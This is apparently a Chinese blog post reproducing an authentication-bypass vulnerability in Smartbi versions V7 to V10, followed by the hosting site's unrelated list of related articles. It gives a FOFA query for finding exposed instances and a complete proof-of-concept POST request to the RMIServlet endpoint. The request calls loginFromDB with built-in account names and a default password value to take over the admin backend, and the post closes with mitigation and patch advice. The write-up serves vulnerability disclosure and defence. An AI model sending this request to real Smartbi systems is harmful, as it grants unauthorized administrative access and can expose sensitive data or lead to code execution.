Smartbi内置用户登陆绕过漏洞复现

0x01 产品简介

       Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。

0x02 漏洞概述

     Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。

0x03 影响范围

     V7 <= Smartbi <= V10

0x04 复现环境

FOFA:app="SMARTBI"

c5526ccdaa1d4427a55bdc756f92c6e0.png

0x05 漏洞复现 

验证漏洞是否存在

http://your-ip/smartbi/vision/RMIServlet

a434c1a6b8a0451fad7afc4a9c789fea.png

 出现以上这种情况,则存在漏洞

  PoC:

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedclassName=UserService&methodName=loginFromDB&params=["system","0a"]

8dea4e1d10c44e9f9c2ec0cbe3d27ce2.png

请求体中传入的三个参数

className:必须指定UserService类名methodName:该类调用的方法loginFromDB

params:其中的第一个参数是内置的三个用户名(public、service、system)可随机构造,第二个参数是三个账号默认的密文密码(默认值为0a)

使用Hackbar插件发送post请求绕过登录

be456fe3375f4049b3fc56cdd55d6912.png

发送请求后,重新刷新页面即可登录后台

d6214898ff70409399b1d8dec5fb606c.png 

 0x06 修复建议

临时缓解方案

在确认不影响业务的前提下,删除内置的几个账号(public、service、system)。同时如非必要,不要将Smartbi系统开放在互联网上。

升级修复方案

官方已发布升级补丁包,支持在线升级和离线补丁安装

Smartbi 思迈特软件-安全补丁包下载

 

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/33009.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用Golang实现Typora图片上传插件

使用Golang实现Typora图片上传插件 描述 golang 1.20 除了服务端有个gin没有用别的库&#xff0c;理论上跨平台没问题的&#xff0c;自行测试吧 只支持自建服务器&#xff0c;包含了Typora编辑器插件以及服务端&#xff0c;整个代码以及逻辑都是CHATGPT生成的&#xff0c;我仅…

chatgpt赋能python:Python考证:让你成为真正的专家

Python考证&#xff1a;让你成为真正的专家 作为一名有10年Python编程经验的工程师&#xff0c;我认为Python考证是成为真正专家的必备条件之一。Python是目前最为流行的编程语言之一&#xff0c;而考证是证明自己的专业知识和技能的重要手段之一&#xff0c;特别是在日益激烈…

可解释机器学习导论

可解释机器学习公开课&#xff0c;包含人工智能可解释性、显著性分析领域的导论、算法综述、经典论文精读、代码实战、前沿讲座。由B站知名人工智能科普UP主“同济子豪兄”主讲。 课程主页&#xff1a;https://github.com/TommyZihao/zihao_course/blob/main/XAI 一起打开AI的黑…

【蓝桥真题】——2022年蓝桥pythonB组省赛真题+解析+代码(通俗易懂版)

大家好&#xff0c;我是爱分享的小蓝&#xff0c;欢迎大家来对答案~ 全文目录 &#x1f3c6;混奖感言 ⭐试题 A: 排列字母 &#x1f4a1;思路点拨 &#x1f35e;代码详解 ⭐试题 B: 寻找整数 &#x1f4a1;思路点拨 &#x1f35e;代码详解 ⭐试题 C: 纸张尺寸 &…

计算机随机试题是这么随机的,用 Excel 生成随机抽题的考试试卷

随机抽题是目前非常流行的一种组卷形式&#xff0c;不仅现在的计算机考试系统基本上都具有随机抽题组卷功能&#xff0c;纸笔考试也是如此。因为现在强调教考分离&#xff0c;就学校内部而言&#xff0c;很多都是有现成的试题库&#xff0c;考试时根据要求在试题库中随机抽题组…

深度洞见|品牌如何布局微信生态,玩转私域运营?

这是神策研究院深度洞见系列文章的第三期&#xff0c;重点介绍微信生态的基础能力、微信作为私域运营主战场的优势及主要趋势。本文共计 3340 字&#xff0c;阅读时间约 10 分钟。 近两年消费市场的低迷、疫情的反复让零售难上加难&#xff0c;私域运营逐渐承担起了品牌零售商…

企业微信服务商代开发自建应用配置以及对接

目录 1.代开发应用模板创建与配置 1.1创建代开发应用模板 1.2模板配置开发信息 1.3模板回调处理微信后台通知事件 1.4应用回调URL配置 1.5获取代开发应用secret(permanent_code) 2.代开发应用上线 3.代开发应用获取企业微信用户信息 1.代开发应用模板创建与配置 1.1创建…

从“在哪儿”到“去哪儿”,广和通5G+Cat1+GNSS模组全面赋能定位应用场景

从日常导航寻路&#xff0c;到信息定位&#xff0c;再到资产追踪&#xff0c;现代生活与工作几乎都无法离开“位置信息”而运作。无论是物联网应用场景的实现&#xff0c;还是物联网商业模式的创新&#xff0c;都需要定位信息作为数据支撑。根据Market Insight Reports报告预测…

再记公式弱爆了!用 ChatGPT 将 Excel 工作效率提高 10 倍

公众号关注 「奇妙的 Linux 世界」 设为「星标」&#xff0c;每天带你玩转 Linux &#xff01; 在未来&#xff0c;精通 Excel 或许不再是简历亮点了。 ChatGPT 自去年 11 月 30 日 OpenAI 重磅推出以来&#xff0c;这款 AI 聊天机器人迅速成为 AI 界的「当红炸子鸡」。 一经发…

最新AI创作系统+支持ai绘画+支持GPT4.0+实时语音识别输入+文章资讯发布功能+用户会员套餐+后台一键版本更新!

最新AI创作系统支持ai绘画支持GPT4.0实时语音识别输入文章资讯发布功能用户会员套餐后台一键版本更新&#xff01; AI创作系统一、源码系统介绍二、AI创作系统程序下载三、安装教程四、主要功能展示五、更新日志 AI创作系统 AI创作系统: 1、提问&#xff1a;程序已经支持GPT3.…

最新AI创作ChatGPT系统V5.0.5+支持GPT4.0+支持ai绘画+实时语音识别输入+用户会员套餐

最新AI创作ChatGPT系统V5.0.5支持GPT4.0支持ai绘画实时语音识别输入用户会员套餐 AI创作ChatGPT系统一、源码系统介绍二、AI创作系统程序下载三、安装教程四、主要功能展示五、更新日志 程序已支持ChatGPT4.0、Midjourney绘画、GPT3.5绘画、新增绘画广场功能、Prompt功能&#…

如何制作“虚拟主播”?小灰一分钟教给大家!

什么是虚拟主播&#xff1f; 虚拟主播也被称为数字人&#xff0c;是一种通过计算机生成图像技术创建的虚拟角色&#xff0c;用于制作视频和直播&#xff0c;甚至是全息投影。 虚拟主播早就不是一个新概念了&#xff0c;前几年在日本很流行的虚拟网红初音未来、绊爱&#xff0c;…

手把手教你打造自己的 AI 虚拟主播

零、写在前面一、 准备环境二、配置软件环境2.1 OBS 安装2.2. VTube Studio 安装 三、开启 B 站直播四、开启 AI 主播五、直播最终效果 零、写在前面 AI 直播在近年来得到了快速的发展和普及&#xff0c;它已经成为了直播平台的重要组成部分。目前&#xff0c;许多知名的直播平…

Linux下基于UDP的简易多人聊天室创建——群聊、私聊、上线通知(Socket编程)

Linux下基于UDP的简易多人聊天室创建&#xff08;Socket编程&#xff09; OSI和TCP/IP&#xff1a;关于TCP/IP协议关于UDP协议UDP编程的一般步骤[^2] Socket套接字网络编程UDP网络聊天室实现功能概述服务器编程客户端编程运行结果 总结遇到的问题服务器编程客户端编程 本文采用…

基于Linux下TCP/IP协议局域网聊天室

这几天一直在看TCP/IP这块的内容,写个简单socket通信demo,实现了多个客户端相互发送消息,以及服务端给多个客户端发送上线/下线消息 基本框架: server.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> #inc…

第22节 NAT——实现公私有IP地址转换

NAT 1 NAT概述1.1 IP地址概述1.2NAT概述 2 NAT分类2.1 静态NAT2.2 动态NAT2.3 PAT2.4 静态PAT 3 NAT命令3.1 定义内外网接口3.2 配置PAT3.3 配置静态端口转换 4 路由器工作原理归纳完善5 总结 1 NAT概述 1.1 IP地址概述 ipv4地址使用现状&#xff1a;现在已严重不够用。仅ABC…

Linux_C_tcp/ip通信

目录 代码相互收发文本交互 遇到的问题 代码 相互收发 server代码 /********** 1、在服务器端接受消息时知道对方的IP和端口提示&#xff1a;bind出现&#xff1a;Address already in use 方法&#xff1a;netstat -nap查看 用kill -9 pid杀死 2、利用TCP实现文件传输 **…

法大大Luke:打造深度生态,实现联合创新

4月26日&#xff0c;国内领先的电子合同和电子签云服务平台法大大举办了以“数智‘签’引&#xff0c;万物生长”为主题的春季产品发布会&#xff0c;并推出全新一代数智化签约管理平台。该平台型产品经过2年半的调研分析及打磨验证&#xff0c;聚焦新的市场环境下企业、组织、…

在阿里6年,但今年这情况,劝大家还是多一手准备吧

大家期待的经济繁荣&#xff0c;没有来。 往年的金三银四&#xff0c;跳槽涨薪&#xff0c;也没有来。 来了的&#xff0c;是大公司裁员的消息频频爆出。 来了的&#xff0c;是ChatGPT&#xff0c;第一批受到影响的人已经失业了。 而且你有没有发现&#xff0c;它平时没什么…

【企业架构设计实战】大数据架构设计

目录 数据架构概述 什么是数据? 什么是数据架构